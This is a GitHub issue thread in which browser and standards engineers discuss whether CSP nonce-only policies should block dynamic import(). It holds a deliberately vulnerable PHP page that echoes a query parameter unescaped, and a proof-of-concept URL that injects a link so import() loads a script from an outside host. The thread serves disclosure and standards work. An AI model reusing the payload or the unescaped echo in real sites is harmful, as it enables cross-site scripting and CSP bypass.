Any protection against dynamic module import?

[shhnjk]

Example here shows a potential risk of CSP bypass when a developer uses dynamic module import. Just for simplicity, I've created bit modified page with CSP and XSS.

https://vuln.shhnjk.com/dynamite.php

<?php header("X-XSS-Protection: 0"); ?>
<!DOCTYPE html>
<meta http-equiv="Content-Security-Policy" content="default-src 'self'; script-src 'nonce-test'">
<nav>
  <a href="books.html" data-entry-module="books">Books</a>
  <a href="movies.html" data-entry-module="movies">Movies</a>
  <a href="video-games.html" data-entry-module="video-games">Video Games</a>
</nav>
<!-- XSS starts -->
<?php echo $_GET["xss"] ?>

<main>Content will load here!</main>

<script nonce="test">
    const main = document.querySelector("main");
  for (const link of document.querySelectorAll("nav > a")) {
    link.addEventListener("click", e => {
      e.preventDefault();

      import(`/${link.dataset.entryModule}.js`)
        .then(module => {
          module.loadPageInto(main);
        })
        .catch(err => {
          main.textContent = err.message;
        });
    });
  }
</script>

Below PoC triggers XSS.
https://vuln.shhnjk.com/dynamite.php?xss=%3Cnav%3E%3Ca%20href=%22%22%20data-entry-module=%22/attack.shhnjk.com/allow.php?%22%3E%3Ch1%3EClick%20ME%3C/h1%3E%3C/a%3E

Any thoughts on protection against such attack?

[mozfreddyb]

I can't reproduce this bypass on either Firefox 58 (nightly) nor Chromium 61.

The former reports

SyntaxError: import declarations may only appear at top level of a module (line 18)

the latter says

Uncaught SyntaxError: Unexpected token import

Can you help us reproduce?

[shhnjk]

This is Dynamic module import which is only implemented on Safari for now.
https://groups.google.com/a/chromium.org/forum/#!msg/blink-dev/ut-Mr0jt5X8/Q8B4F3wxBQAJ

[mozfreddyb]

Ah, I see this relies on this dynamic import proposal that has yet to land in most browsers.

Looking at the script-src definition, I read

The script-src directive restricts the locations from which scripts may be executed. This includes not only URLs loaded directly into script elements, but also things like inline script blocks and XSLT stylesheets [XSLT] which can trigger script execution. The syntax for the directive’s name and value is described by the following ABNF:

Maybe this needs to be extended to module scripts, dynamically loaded or not?

[annevk]

script-src as normatively defined through Fetch et al already accounts for module scripts and would block them. So while you could clarify the non-normative bits, this is at best an implementation bug.

[shhnjk]

I'm not worried about whitelist restriction. It would work in this case if specified.
But as far as reading document and research about CSP (here, here, and here), Strict-dynamic and Nonce based CSP protection is recommended for easy rollout and better protection.

But dynamic import allows Script-gadgets-like attack.

[annevk]

That's true for importScripts() too. At that point you're discussing whatwg/html#2640 (which unfortunately has a lot of noise toward the end now).

[shhnjk]

1. importScripts() only works on worker context. Where import() can be called anywhere (does not need "module" attribute).
2. import() intentionally provides dynamic loading of scripts depending on DOM structure and attributes. Where importScripts() doesn't.

[annevk]

That's fair, it pokes a hole in the status quo for documents that is unexpected.

cc @whatwg/modules @domenic

[domenic]

We've been careful to plumb the CSP machinery through while designing the dynamic import integration. For example, it is subject to nonce or script-src controls. Here you have explicitly said that the import is allowed by using the nonce on the containing type=module, for example.

In general we indeed treat this similarly to importScripts() or to inserting <script> elements.

I'm not sure what more we should be doing, if anything. Maybe it'd be easier to evaluate with a concrete proposal.

[shhnjk]

Well, if @mikewest has no concern, then I'm okay with it.

[arturjanc]

The current behavior seems problematic to me; if import() allows loading a new external script then it would be surprising if a nonce-less load was permitted by policy which requires all scripts to be blessed with a nonce.

Such behavior is what I would expect from a policy with 'strict-dynamic' -- import() is a programmatic API so the load should succeed in that case. However, for a nonce-only policy like in the example above the load should fail.

From a developer's point of view I think it makes sense to treat import(foo) like x=document.createElement('script'); x.src=foo. I.e. the load should be subject to the script-src host-source whitelist if present; otherwise, it should be allowed only if the policy includes 'strict-dynamic'.

If we agree, this means that a pure nonce-only CSP like in the example above cannot allow loading scripts via import. This should be fine because developers who use nonces without 'strict-dynamic' usually use them for inline scripts and use a whitelist for external scripts, which they could also do in this case. Developers who don't use a whitelist at all usually specify 'strict-dynamic' so if the current permissive behavior starts applying only in this case, they would also be fine (at the cost of allowing injections into import() to bypassing their policy, but that's part and parcel of 'strict-dynamic').

Additionally, it might be good to provide a mechanism allowing developers to allow import() to work with a nonce-only policy. This will reduce the likelihood that developers who want to have the safest nonce-based policies (without 'strict-dynamic') would need to start adding URLs to their script-src to work around this.

@mikewest WDYT?

[devd]

Hmm... We do use nonce based policies for external scripts and not inline scripts (recaptcha) so I would really like it if a nonce based import was supported too

…

On Nov 23, 2017 12:17 AM, "arturjanc" ***@***.***> wrote: The current behavior seems problematic to me; if import() allows loading a new external script then it would be surprising if a nonce-less load was permitted by policy which requires all scripts to be blessed with a nonce. Such behavior is what I would expect from a policy with 'strict-dynamic' -- import() is a programmatic API so the load should succeed in that case. However, for a nonce-only policy like in the example above the load should fail. From a developer's point of view I think it makes sense to treat import(foo) like x=document.createElement('script'); x.src=foo. I.e. the load should be subject to the script-src *host-source* whitelist if present; otherwise, it should be allowed only if the policy includes 'strict-dynamic'. If we agree, this means that a pure nonce-only CSP like in the example above cannot allow loading scripts via import. This should be fine because developers who use nonces without 'strict-dynamic' usually use them for inline scripts and use a whitelist for external scripts, which they could also do in this case. Developers who don't use a whitelist at all usually specify 'strict-dynamic' so if the current permissive behavior starts applying only in this case, they would also be fine (at the cost of allowing injections into import() to bypassing their policy, but that's part and parcel of 'strict-dynamic'). Additionally, it might be good to provide a mechanism allowing developers to allow import() to work with a nonce-only policy. This will reduce the likelihood that developers who want to have the safest nonce-based policies (without 'strict-dynamic') would need to start adding URLs to their script-src to work around this. @mikewest <https://github.com/mikewest> WDYT? — You are receiving this because you are subscribed to this thread. Reply to this email directly, view it on GitHub <#243 (comment)>, or mute the thread <https://github.com/notifications/unsubscribe-auth/AAIXGdQ-gOm9e-HNGMuhyA0S6cZWBBn3ks5s5Ll9gaJpZM4Pmgee> .

[arturjanc]

Makes sense. Would you be okay with breaking the current behavior (i.e. nonce-only doesn't allow blessing import()) before we figure out how to allow nonces to work for this case? My slight worry is that if we wait, developers will start relying on this (as in, create nonce-only policies and use module imports in their apps) and making the behavior more restrictive later will break more people.

[devd]

Yes but maybe with an unsafe-imports keyword?

…

On Nov 23, 2017 9:18 PM, "arturjanc" ***@***.***> wrote: Makes sense. Would you be okay with breaking the current behavior (i.e. nonce-only doesn't allow blessing import()) before we figure out how to allow nonces to work for this case? My slight worry is that if we wait, developers will start relying on this (as in, create nonce-only policies and use module imports in their apps) and making the behavior more restrictive later will break more people. — You are receiving this because you commented. Reply to this email directly, view it on GitHub <#243 (comment)>, or mute the thread <https://github.com/notifications/unsubscribe-auth/AAIXGY7SpgeTbqKUTEScOikyTGg6PaAmks5s5ZPmgaJpZM4Pmgee> .